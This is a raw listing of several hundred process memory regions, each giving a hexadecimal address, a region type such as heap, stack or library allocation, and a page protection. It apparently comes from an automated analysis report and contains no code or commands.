page read and write
|
||
BB53000
|
heap
|
page read and write
|
||
B931000
|
heap
|
page read and write
|
||
BBC0000
|
heap
|
page read and write
|
||
85C8000
|
heap
|
page read and write
|
||
284B0940000
|
trusted library allocation
|
page read and write
|
||
284B0670000
|
trusted library allocation
|
page read and write
|
||
B98E000
|
heap
|
page read and write
|
||
8999000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
85D2000
|
heap
|
page read and write
|
||
87E8000
|
heap
|
page read and write
|
||
A68F000
|
heap
|
page read and write
|
||
87E8000
|
heap
|
page read and write
|
||
88F7000
|
heap
|
page read and write
|
||
A68F000
|
heap
|
page read and write
|
||
4948000
|
heap
|
page read and write
|
||
87E8000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
B663000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
87F3000
|
heap
|
page read and write
|
||
A696000
|
heap
|
page read and write
|
||
284B064D000
|
trusted library allocation
|
page read and write
|
||
B9BE000
|
heap
|
page read and write
|
||
284B068E000
|
trusted library allocation
|
page read and write
|
||
B886000
|
heap
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
BBEF000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
284B0371000
|
trusted library allocation
|
page read and write
|
||
ADDE000
|
heap
|
page read and write
|
||
882B000
|
heap
|
page read and write
|
||
8920000
|
heap
|
page read and write
|
||
FDCF000
|
stack
|
page read and write
|
||
284AB71A000
|
heap
|
page read and write
|
||
284B09B0000
|
trusted library allocation
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
8789000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
8789000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
87F3000
|
heap
|
page read and write
|
||
284B06FC000
|
trusted library allocation
|
page read and write
|
||
BB66000
|
heap
|
page read and write
|
||
8942000
|
heap
|
page read and write
|
||
BAD7000
|
heap
|
page read and write
|
||
284AAE9F000
|
heap
|
page read and write
|
||
B6D4000
|
heap
|
page read and write
|
||
88FB000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
87F7000
|
heap
|
page read and write
|
||
DDB0000
|
trusted library allocation
|
page read and write
|
||
4950000
|
heap
|
page read and write
|
||
C023000
|
trusted library allocation
|
page read and write
|
||
87FD000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
87F5000
|
heap
|
page read and write
|
||
BA52000
|
heap
|
page read and write
|
||
4B8B000
|
heap
|
page read and write
|
||
E1C0000
|
trusted library allocation
|
page read and write
|
||
DD90000
|
trusted library allocation
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
BA1D000
|
heap
|
page read and write
|
||
E210000
|
heap
|
page read and write
|
||
BC02000
|
heap
|
page read and write
|
||
BB14000
|
heap
|
page read and write
|
||
FCC000
|
heap
|
page read and write
|
||
107E000
|
heap
|
page read and write
|
||
4C4D000
|
heap
|
page read and write
|
||
BBCF000
|
heap
|
page read and write
|
||
8772000
|
heap
|
page read and write
|
||
86AA000
|
heap
|
page read and write
|
||
4921000
|
heap
|
page read and write
|
||
F50000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
A68B000
|
heap
|
page read and write
|
||
BA67000
|
heap
|
page read and write
|
||
B6B1000
|
heap
|
page read and write
|
||
B884000
|
heap
|
page read and write
|
||
BA23000
|
heap
|
page read and write
|
||
124B000
|
heap
|
page read and write
|
||
8942000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
DD80000
|
trusted library allocation
|
page read and write
|
||
A5CE000
|
stack
|
page read and write
|
||
8944000
|
heap
|
page read and write
|
||
BB33000
|
heap
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
B98B000
|
heap
|
page read and write
|
||
883D000
|
heap
|
page read and write
|
||
124F000
|
heap
|
page read and write
|
||
B25B000
|
stack
|
page read and write
|
||
BA37000
|
heap
|
page read and write
|
||
BAAC000
|
heap
|
page read and write
|
||
BB5B000
|
heap
|
page read and write
|
||
88FE000
|
heap
|
page read and write
|
||
284B03F0000
|
trusted library allocation
|
page read and write
|
||
8944000
|
heap
|
page read and write
|
||
B981000
|
heap
|
page read and write
|
||
4D10000
|
trusted library allocation
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
8920000
|
heap
|
page read and write
|
||
87F7000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
87EE000
|
heap
|
page read and write
|
||
284AAEAE000
|
heap
|
page read and write
|
||
5520000
|
trusted library section
|
page read and write
|
||
8620000
|
heap
|
page read and write
|
||
4BD2000
|
heap
|
page read and write
|
||
B9FE000
|
heap
|
page read and write
|
||
B9FB000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
A696000
|
heap
|
page read and write
|
||
A665000
|
heap
|
page read and write
|
||
8931000
|
heap
|
page read and write
|
||
D9BC000
|
stack
|
page read and write
|
||
284B03D0000
|
trusted library allocation
|
page read and write
|
||
295A000
|
stack
|
page read and write
|
||
4BF3000
|
heap
|
page read and write
|
||
BA4B000
|
heap
|
page read and write
|
||
85F8000
|
heap
|
page read and write
|
||
883C000
|
heap
|
page read and write
|
||
B9B9000
|
heap
|
page read and write
|
||
A6A2000
|
heap
|
page read and write
|
||
B31F000
|
stack
|
page read and write
|
||
87F7000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
284AADA0000
|
heap
|
page read and write
|
||
B67B000
|
heap
|
page read and write
|
||
B9B2000
|
heap
|
page read and write
|
||
8966000
|
heap
|
page read and write
|
||
284B0462000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
87F5000
|
heap
|
page read and write
|
||
87FB000
|
heap
|
page read and write
|
||
BB5B000
|
heap
|
page read and write
|
||
87F7000
|
heap
|
page read and write
|
||
BB51000
|
heap
|
page read and write
|
||
BB3E000
|
heap
|
page read and write
|
||
284AAE5C000
|
heap
|
page read and write
|
||
87F9000
|
heap
|
page read and write
|
||
87C0000
|
heap
|
page read and write
|
||
284B02E0000
|
trusted library allocation
|
page read and write
|
||
9B4F000
|
stack
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
BAFF000
|
heap
|
page read and write
|
||
86E7000
|
heap
|
page read and write
|
||
48E3000
|
heap
|
page read and write
|
||
BA42000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
284AAE7C000
|
heap
|
page read and write
|
||
87F7000
|
heap
|
page read and write
|
||
880D000
|
heap
|
page read and write
|
||
284B06A0000
|
trusted library allocation
|
page read and write
|
||
284B0608000
|
trusted library allocation
|
page read and write
|
||
8727000
|
heap
|
page read and write
|
||
87EE000
|
heap
|
page read and write
|
||
87F5000
|
heap
|
page read and write
|
||
87F5000
|
heap
|
page read and write
|
||
49A7000
|
heap
|
page read and write
|
||
C080000
|
trusted library allocation
|
page read and write
|
||
B80A000
|
heap
|
page read and write
|
||
87E8000
|
heap
|
page read and write
|
||
284AB75A000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
284B0400000
|
heap
|
page read and write
|
||
A788279000
|
stack
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
B8A2000
|
heap
|
page read and write
|
||
A690000
|
heap
|
page read and write
|
||
B9DA000
|
heap
|
page read and write
|
||
BB3E000
|
heap
|
page read and write
|
||
A6A6000
|
heap
|
page read and write
|
||
BBEC000
|
heap
|
page read and write
|
||
8978000
|
heap
|
page read and write
|
||
ADC8000
|
heap
|
page read and write
|
||
BDA000
|
stack
|
page read and write
|
||
284B06A0000
|
trusted library allocation
|
page read and write
|
||
8708000
|
heap
|
page read and write
|
||
284B041C000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
1380000
|
remote allocation
|
page read and write
|
||
BB53000
|
heap
|
page read and write
|
||
BA2F000
|
heap
|
page read and write
|
||
284AAEAE000
|
heap
|
page read and write
|
||
A68B000
|
heap
|
page read and write
|
||
87FB000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
BB8C000
|
heap
|
page read and write
|
||
BA1B000
|
heap
|
page read and write
|
||
BBEF000
|
heap
|
page read and write
|
||
87EE000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
A68B000
|
heap
|
page read and write
|
||
BA42000
|
heap
|
page read and write
|
||
A696000
|
heap
|
page read and write
|
||
87FB000
|
heap
|
page read and write
|
||
A68B000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
7DF4F0F21000
|
trusted library allocation
|
page execute read
|
||
7DF4F0F50000
|
trusted library allocation
|
page readonly
|
||
C000000
|
trusted library allocation
|
page read and write
|
||
A1C0000
|
heap
|
page read and write
|
||
E212000
|
heap
|
page read and write
|
||
87FB000
|
heap
|
page read and write
|
||
4906000
|
heap
|
page read and write
|
||
B951000
|
heap
|
page read and write
|
||
894A000
|
heap
|
page read and write
|
||
87E8000
|
heap
|
page read and write
|
||
2A73000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
BC0E000
|
heap
|
page read and write
|
||
1243000
|
heap
|
page read and write
|
||
BB2E000
|
heap
|
page read and write
|
||
87EE000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
284B03E0000
|
trusted library allocation
|
page read and write
|
||
DBBA000
|
stack
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
B687000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
B8CC000
|
heap
|
page read and write
|
||
896F000
|
heap
|
page read and write
|
||
BBEC000
|
heap
|
page read and write
|
||
8931000
|
heap
|
page read and write
|
||
284B06FF000
|
trusted library allocation
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
8772000
|
heap
|
page read and write
|
||
B9FE000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
BA52000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
284ABC40000
|
trusted library allocation
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
4909000
|
heap
|
page read and write
|
||
880D000
|
heap
|
page read and write
|
||
85E0000
|
heap
|
page read and write
|
||
A5F8000
|
heap
|
page read and write
|
||
BA40000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
B981000
|
heap
|
page read and write
|
||
880D000
|
heap
|
page read and write
|
||
284B071A000
|
trusted library allocation
|
page read and write
|
||
DDA3000
|
trusted library allocation
|
page read and write
|
||
B69B000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
4B15000
|
heap
|
page read and write
|
||
B9A1000
|
heap
|
page read and write
|
||
BADE000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
B991000
|
heap
|
page read and write
|
||
BBFB000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
A669000
|
heap
|
page read and write
|
||
87C0000
|
heap
|
page read and write
|
||
BAE6000
|
heap
|
page read and write
|
||
A669000
|
heap
|
page read and write
|
||
BAFF000
|
heap
|
page read and write
|
||
A6A7000
|
heap
|
page read and write
|
||
85E4000
|
heap
|
page read and write
|
||
BEC9000
|
stack
|
page read and write
|
||
ADFB000
|
heap
|
page read and write
|
||
87EB000
|
heap
|
page read and write
|
||
4C32000
|
heap
|
page read and write
|
||
4948000
|
heap
|
page read and write
|
||
284B06E5000
|
trusted library allocation
|
page read and write
|
||
4BD1000
|
heap
|
page read and write
|
||
A6A4000
|
heap
|
page read and write
|
||
87FD000
|
heap
|
page read and write
|
||
284B06BA000
|
trusted library allocation
|
page read and write
|
||
862F000
|
heap
|
page read and write
|
||
ADF6000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
BBEC000
|
heap
|
page read and write
|
||
A6A2000
|
heap
|
page read and write
|
||
BA3F000
|
heap
|
page read and write
|
||
87C0000
|
heap
|
page read and write
|
||
B410000
|
remote allocation
|
page read and write
|
||
B9FB000
|
heap
|
page read and write
|
||
BB88000
|
heap
|
page read and write
|
||
87EB000
|
heap
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
7DF4F0F20000
|
trusted library allocation
|
page readonly
|
||
A640000
|
heap
|
page read and write
|
||
BAF8000
|
heap
|
page read and write
|
||
86A8000
|
heap
|
page read and write
|
||
A6A6000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
B907000
|
heap
|
page read and write
|
||
ADA9000
|
heap
|
page read and write
|
||
4C7C000
|
heap
|
page read and write
|
||
284AAE00000
|
heap
|
page read and write
|
||
87F9000
|
heap
|
page read and write
|
||
4906000
|
heap
|
page read and write
|
||
869D000
|
heap
|
page read and write
|
||
8999000
|
heap
|
page read and write
|
||
B907000
|
heap
|
page read and write
|
||
A636000
|
heap
|
page read and write
|
||
85BB000
|
heap
|
page read and write
|
||
A66F000
|
heap
|
page read and write
|
||
C060000
|
trusted library allocation
|
page read and write
|
||
4B66000
|
heap
|
page read and write
|
||
B7D6000
|
heap
|
page read and write
|
||
C0DB000
|
stack
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
B912000
|
heap
|
page read and write
|
||
8983000
|
heap
|
page read and write
|
||
8902000
|
heap
|
page read and write
|
||
31F6000
|
stack
|
page read and write
|
||
882B000
|
heap
|
page read and write
|
||
8973000
|
heap
|
page read and write
|
||
BA1D000
|
heap
|
page read and write
|
||
4BFE000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
BB33000
|
heap
|
page read and write
|
||
284B0491000
|
heap
|
page read and write
|
||
7DF4F0F71000
|
trusted library allocation
|
page execute read
|
||
BB88000
|
heap
|
page read and write
|
||
284B0456000
|
heap
|
page read and write
|
||
8804000
|
heap
|
page read and write
|
||
493B000
|
heap
|
page read and write
|
||
87E8000
|
heap
|
page read and write
|
||
284B0618000
|
trusted library allocation
|
page read and write
|
||
BB5B000
|
heap
|
page read and write
|
||
B951000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
124E000
|
heap
|
page read and write
|
||
B697000
|
heap
|
page read and write
|
||
284B060E000
|
trusted library allocation
|
page read and write
|
||
8EA0000
|
heap
|
page read and write
|
||
BB45000
|
heap
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
284B0664000
|
trusted library allocation
|
page read and write
|
||
88C2000
|
heap
|
page read and write
|
||
883D000
|
heap
|
page read and write
|
||
4C5E000
|
heap
|
page read and write
|
||
B685000
|
heap
|
page read and write
|
||
A68F000
|
heap
|
page read and write
|
||
893E000
|
heap
|
page read and write
|
||
B904000
|
heap
|
page read and write
|
||
E080000
|
heap
|
page read and write
|
||
B907000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
8931000
|
heap
|
page read and write
|
||
BAFB000
|
heap
|
page read and write
|
||
D60000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
86ED000
|
heap
|
page read and write
|
||
4948000
|
heap
|
page read and write
|
||
BBEF000
|
heap
|
page read and write
|
||
B8D1000
|
heap
|
page read and write
|
||
B92F000
|
heap
|
page read and write
|
||
B68B000
|
heap
|
page read and write
|
||
B64B000
|
stack
|
page read and write
|
||
BADC000
|
heap
|
page read and write
|
||
A787AFE000
|
stack
|
page read and write
|
||
ADA0000
|
heap
|
page read and write
|
||
B980000
|
heap
|
page read and write
|
||
8965000
|
heap
|
page read and write
|
||
8843000
|
heap
|
page read and write
|
||
48EF000
|
heap
|
page read and write
|
||
284B03A0000
|
trusted library allocation
|
page read and write
|
||
2EBE000
|
stack
|
page read and write
|
||
BB5B000
|
heap
|
page read and write
|
||
4D0D000
|
heap
|
page read and write
|
||
B863000
|
heap
|
page read and write
|
||
87E8000
|
heap
|
page read and write
|
||
8714000
|
heap
|
page read and write
|
||
E41B000
|
stack
|
page read and write
|
||
B9B2000
|
heap
|
page read and write
|
||
BA52000
|
heap
|
page read and write
|
||
BBF6000
|
heap
|
page read and write
|
||
284B03A0000
|
trusted library allocation
|
page read and write
|
||
87FD000
|
heap
|
page read and write
|
||
BAF0000
|
heap
|
page read and write
|
||
B93A000
|
heap
|
page read and write
|
||
882B000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
B693000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
BA32000
|
heap
|
page read and write
|
||
B907000
|
heap
|
page read and write
|
||
BB42000
|
heap
|
page read and write
|
||
284B0707000
|
trusted library allocation
|
page read and write
|
||
47C3000
|
heap
|
page read and write
|
||
A4CE000
|
stack
|
page read and write
|
||
ADAE000
|
heap
|
page read and write
|
||
7DF4F0F21000
|
trusted library allocation
|
page execute read
|
||
A68F000
|
heap
|
page read and write
|
||
BA52000
|
heap
|
page read and write
|
||
C030000
|
trusted library allocation
|
page read and write
|
||
BA21000
|
heap
|
page read and write
|
||
4CFB000
|
heap
|
page read and write
|
||
B907000
|
heap
|
page read and write
|
||
116E000
|
stack
|
page read and write
|
||
C020000
|
trusted library allocation
|
page read and write
|
||
8999000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
284B0600000
|
trusted library allocation
|
page read and write
|
||
A665000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
284B066F000
|
trusted library allocation
|
page read and write
|
||
87E8000
|
heap
|
page read and write
|
||
A644000
|
heap
|
page read and write
|
||
8099000
|
stack
|
page read and write
|
||
4902000
|
heap
|
page read and write
|
||
BA4E000
|
heap
|
page read and write
|
||
BC43000
|
heap
|
page read and write
|
||
87EB000
|
heap
|
page read and write
|
||
A5F2000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
B5C9000
|
stack
|
page read and write
|
||
BB75000
|
heap
|
page read and write
|
||
BEF0000
|
trusted library allocation
|
page read and write
|
||
BA70000
|
heap
|
page read and write
|
||
BB11000
|
heap
|
page read and write
|
||
892E000
|
heap
|
page read and write
|
||
A669000
|
heap
|
page read and write
|
||
BB33000
|
heap
|
page read and write
|
||
BB8B000
|
heap
|
page read and write
|
||
7DF4F0F60000
|
trusted library allocation
|
page readonly
|
||
893E000
|
heap
|
page read and write
|
||
87F3000
|
heap
|
page read and write
|
||
87EB000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
284AAE25000
|
heap
|
page read and write
|
||
A68F000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
B931000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
BA59000
|
heap
|
page read and write
|
||
C090000
|
trusted library allocation
|
page read and write
|
||
898F000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
284B0500000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
284B06F1000
|
trusted library allocation
|
page read and write
|
||
85E4000
|
heap
|
page read and write
|
||
87EE000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
A696000
|
heap
|
page read and write
|
||
880D000
|
heap
|
page read and write
|
||
DDA0000
|
trusted library allocation
|
page read and write
|
||
B65B000
|
heap
|
page read and write
|
||
BAFB000
|
heap
|
page read and write
|
||
488E000
|
heap
|
page read and write
|
||
284B0372000
|
trusted library allocation
|
page read and write
|
||
87F7000
|
heap
|
page read and write
|
||
C040000
|
trusted library allocation
|
page read and write
|
||
47B9000
|
heap
|
page read and write
|
||
B98B000
|
heap
|
page read and write
|
||
B410000
|
remote allocation
|
page read and write
|
||
A690000
|
heap
|
page read and write
|
||
8942000
|
heap
|
page read and write
|
||
284AAF00000
|
heap
|
page read and write
|
||
8798000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
BA4B000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
BAD7000
|
heap
|
page read and write
|
||
87FB000
|
heap
|
page read and write
|
||
BBEF000
|
heap
|
page read and write
|
||
87FB000
|
heap
|
page read and write
|
||
4BC4000
|
heap
|
page read and write
|
||
FD3000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
8973000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
B9DA000
|
heap
|
page read and write
|
||
B951000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
B91F000
|
heap
|
page read and write
|
||
B650000
|
heap
|
page read and write
|
||
BA4C000
|
heap
|
page read and write
|
||
BBB6000
|
heap
|
page read and write
|
||
B959000
|
heap
|
page read and write
|
||
8804000
|
heap
|
page read and write
|
||
BB88000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
BBCF000
|
heap
|
page read and write
|
||
BC02000
|
heap
|
page read and write
|
||
ADF6000
|
heap
|
page read and write
|
||
A68E000
|
heap
|
page read and write
|
||
A2BE000
|
stack
|
page read and write
|
||
85CB000
|
heap
|
page read and write
|
||
47B0000
|
heap
|
page read and write
|
||
BB53000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
B68D000
|
heap
|
page read and write
|
||
86C8000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
A6A2000
|
heap
|
page read and write
|
||
BB98000
|
heap
|
page read and write
|
||
B98E000
|
heap
|
page read and write
|
||
ADE3000
|
heap
|
page read and write
|
||
A1BD000
|
stack
|
page read and write
|
||
4C0C000
|
heap
|
page read and write
|
||
B98B000
|
heap
|
page read and write
|
||
B931000
|
heap
|
page read and write
|
||
E050000
|
trusted library allocation
|
page read and write
|
||
880D000
|
heap
|
page read and write
|
||
85E2000
|
heap
|
page read and write
|
||
B991000
|
heap
|
page read and write
|
||
B98B000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
B6A7000
|
heap
|
page read and write
|
||
4B9E000
|
heap
|
page read and write
|
||
8999000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
DD80000
|
trusted library allocation
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
284AB704000
|
heap
|
page read and write
|
||
85E9000
|
heap
|
page read and write
|
||
8719000
|
heap
|
page read and write
|
||
87C0000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
1240000
|
heap
|
page read and write
|
||
87EB000
|
heap
|
page read and write
|
||
8999000
|
heap
|
page read and write
|
||
A54F000
|
stack
|
page read and write
|
||
8973000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
B9D7000
|
heap
|
page read and write
|
||
284AB702000
|
heap
|
page read and write
|
||
BB75000
|
heap
|
page read and write
|
||
BADA000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
B667000
|
heap
|
page read and write
|
||
1244000
|
heap
|
page read and write
|
||
8966000
|
heap
|
page read and write
|
||
BB3E000
|
heap
|
page read and write
|
||
1270000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
8804000
|
heap
|
page read and write
|
||
7840000
|
trusted library section
|
page readonly
|
||
A6A2000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
BB8C000
|
heap
|
page read and write
|
||
B67F000
|
heap
|
page read and write
|
||
B05000
|
stack
|
page read and write
|
||
882B000
|
heap
|
page read and write
|
||
8714000
|
heap
|
page read and write
|
||
B410000
|
remote allocation
|
page read and write
|
||
86A6000
|
heap
|
page read and write
|
||
87FB000
|
heap
|
page read and write
|
||
284B0700000
|
remote allocation
|
page read and write
|
||
87EB000
|
heap
|
page read and write
|
||
883C000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
BB33000
|
heap
|
page read and write
|
||
284B0390000
|
trusted library allocation
|
page read and write
|
||
85E2000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
88C2000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
882B000
|
heap
|
page read and write
|
||
BA1B000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
BA2F000
|
heap
|
page read and write
|
||
8891000
|
heap
|
page read and write
|
||
7BFC000
|
stack
|
page read and write
|
||
BB45000
|
heap
|
page read and write
|
||
BB0D000
|
heap
|
page read and write
|
||
13B0000
|
heap
|
page read and write
|
||
85E9000
|
heap
|
page read and write
|
||
86A6000
|
heap
|
page read and write
|
||
E39F000
|
stack
|
page read and write
|
||
BB0F000
|
heap
|
page read and write
|
||
284B1000000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
87F5000
|
heap
|
page read and write
|
||
8804000
|
heap
|
page read and write
|
||
893E000
|
heap
|
page read and write
|
||
284B050A000
|
heap
|
page read and write
|
||
ADBC000
|
heap
|
page read and write
|
||
A787E7E000
|
stack
|
page read and write
|
||
8798000
|
heap
|
page read and write
|
||
5530000
|
trusted library section
|
page read and write
|
||
87EE000
|
heap
|
page read and write
|
||
BB0D000
|
heap
|
page read and write
|
||
4C3F000
|
heap
|
page read and write
|
||
C060000
|
trusted library allocation
|
page read and write
|
||
B8E1000
|
heap
|
page read and write
|
||
A78847B000
|
stack
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
48D4000
|
heap
|
page read and write
|
||
883D000
|
heap
|
page read and write
|
||
2A60000
|
trusted library allocation
|
page read and write
|
||
E0A0000
|
heap
|
page read and write
|
||
896D000
|
heap
|
page read and write
|
||
B9DA000
|
heap
|
page read and write
|
||
99C0000
|
heap
|
page read and write
|
||
BA23000
|
heap
|
page read and write
|
||
8999000
|
heap
|
page read and write
|
||
B658000
|
heap
|
page read and write
|
||
B888000
|
heap
|
page read and write
|
||
BBA7000
|
heap
|
page read and write
|
||
A5D0000
|
heap
|
page read and write
|
||
B9FA000
|
heap
|
page read and write
|
||
B951000
|
heap
|
page read and write
|
||
4CDC000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
125D000
|
heap
|
page read and write
|
||
BBFB000
|
heap
|
page read and write
|
||
4948000
|
heap
|
page read and write
|
||
29DE000
|
stack
|
page read and write
|
||
B9DE000
|
heap
|
page read and write
|
||
493B000
|
heap
|
page read and write
|
||
BB3E000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
C300000
|
trusted library allocation
|
page read and write
|
||
BAD7000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
BAE8000
|
heap
|
page read and write
|
||
284B0360000
|
trusted library allocation
|
page read and write
|
||
86B8000
|
heap
|
page read and write
|
||
4C43000
|
heap
|
page read and write
|
||
BB75000
|
heap
|
page read and write
|
||
284B06E8000
|
trusted library allocation
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
BA9A000
|
heap
|
page read and write
|
||
4960000
|
heap
|
page read and write
|
||
BAD7000
|
heap
|
page read and write
|
||
BADA000
|
heap
|
page read and write
|
||
865C000
|
heap
|
page read and write
|
||
893E000
|
heap
|
page read and write
|
||
BB51000
|
heap
|
page read and write
|
||
7685000
|
stack
|
page read and write
|
||
B884000
|
heap
|
page read and write
|
||
4C6A000
|
heap
|
page read and write
|
||
BADC000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
284B04F9000
|
heap
|
page read and write
|
||
48F2000
|
heap
|
page read and write
|
||
A669000
|
heap
|
page read and write
|
||
85D2000
|
heap
|
page read and write
|
||
A6A6000
|
heap
|
page read and write
|
||
47F3000
|
heap
|
page read and write
|
||
87BB000
|
heap
|
page read and write
|
||
4C51000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
87EE000
|
heap
|
page read and write
|
||
8944000
|
heap
|
page read and write
|
||
284AAEA8000
|
heap
|
page read and write
|
||
7CFE000
|
stack
|
page read and write
|
||
BB51000
|
heap
|
page read and write
|
||
284B06F4000
|
trusted library allocation
|
page read and write
|
||
890F000
|
heap
|
page read and write
|
||
BB42000
|
heap
|
page read and write
|
||
8727000
|
heap
|
page read and write
|
||
A696000
|
heap
|
page read and write
|
||
B681000
|
heap
|
page read and write
|
||
4C4B000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
BAF3000
|
heap
|
page read and write
|
||
AD50000
|
heap
|
page read and write
|
||
87F9000
|
heap
|
page read and write
|
||
284B0690000
|
trusted library allocation
|
page read and write
|
||
BC0E000
|
heap
|
page read and write
|
||
1271000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
31F0000
|
stack
|
page read and write
|
||
B699000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
7DF4F0F31000
|
trusted library allocation
|
page execute read
|
||
A76F000
|
heap
|
page read and write
|
||
B951000
|
heap
|
page read and write
|
||
A5F6000
|
heap
|
page read and write
|
||
B959000
|
heap
|
page read and write
|
||
BBAC000
|
heap
|
page read and write
|
||
BB45000
|
heap
|
page read and write
|
||
284AB602000
|
heap
|
page read and write
|
